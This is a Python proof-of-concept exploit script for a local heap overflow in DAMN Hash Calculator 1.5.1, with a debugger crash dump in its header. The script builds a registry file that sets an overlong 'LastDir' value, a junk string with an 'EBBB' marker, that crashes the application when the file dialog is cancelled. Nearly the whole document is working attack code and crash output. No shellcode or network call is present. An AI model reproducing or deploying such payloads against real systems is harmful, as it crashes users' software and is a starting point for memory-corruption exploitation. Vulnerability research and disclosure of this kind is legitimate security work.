#!/usr/bin/python
# Exploit Title: DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC
# Version: 1.5.1
# Date: 2012-02-21
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.google.com
# Tested on: Windows XP SP3 Professional German
# Notes: Old but nice software...just to prove it's there :-)
# Howto: Import Reg -> Start App -> Select File -> Cancel without choosing one
#7C9204E6 . 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
#7C9204E9 . 0B47 10 OR EAX,DWORD PTR DS:[EDI+10]
#7C9204EC . A9 00000269 TEST EAX,69020000
#7C9204F1 . 0F85 8BA70300 JNZ ntdll.7C95AC82
#7C9204F7 > 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
#7C9204FA . 8A48 FD MOV CL,BYTE PTR DS:[EAX-3] <-- Crash
#7C9204FD . 83C0 F8 ADD EAX,-8
#7C920500 . F6C1 01 TEST CL,1
#7C920503 . 56 PUSH ESI
#7C920504 . 0F84 92A70300 JE ntdll.7C95AC9C
#7C92050A . F6C1 08 TEST CL,8
#7C92050D . 0F85 B3A70300 JNZ ntdll.7C95ACC6
#EAX 42424245
#ECX 00000008
#EDX 77C31AE8 msvcrt.77C31AE8
#EBX 0040F2F0 DAMN_Has.0040F2F0
#ESP 0012F54C
#EBP 0012F550
#ESI 0041A2DC ASCII "EBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
#EDI 00330000
#EIP 7C9204FA ntdll.7C9204FA
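"""Write a ``.reg`` file that sets an overlong ``LastDir`` value.

The header above documents the crash this proof-of-concept reproduces; the
script itself only assembles the registry text and writes it to ``OUT_FILE``.
Importing the module does not touch the filesystem: the write happens only
when the file is executed directly.
"""

# Output path of the generated registry file.
OUT_FILE = "poc.reg"

# Value written to "LastDir": 392 x "A" (0x41), then "EBBB" (0x45 0x42 0x42
# 0x42), then 50 x "C" (0x43) -- the "EBBBCCC..." string is the one visible on
# the ESI line of the register dump in the header.
junk1 = "\x41" * 392
boom = "\x45\x42\x42\x42"
junk2 = "\x43" * 50

# Doubled backslashes: "\S", "\D" and "\H" are not valid escape sequences, and
# relying on the interpreter keeping them verbatim warns on newer Pythons.
# The bytes produced are identical to the single-backslash form.
poc = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_CURRENT_USER\\Software\\DAMN\\Hash Calculator\\Settings]\n"
    "\"LastDir\"=\"" + junk1 + boom + junk2 + "\""
)


def write_poc(path=OUT_FILE, content=poc):
    """Write *content* to *path*.

    Returns True on success and False when the file could not be written.
    Only filesystem errors are caught; anything else indicates a bug in this
    script and is allowed to propagate instead of being hidden.
    """
    # Single-argument print() works on both Python 2 and 3 without __future__.
    print("[*] Creating exploit file...\n")
    try:
        # The context manager closes the handle even if write() raises.
        with open(path, "w") as out:
            out.write(content)
    except (IOError, OSError) as err:
        print("[!] Error while creating file!")
        print("    %s" % err)
        return False
    print("[*] File successfully created!")
    return True


if __name__ == "__main__":
    write_poc()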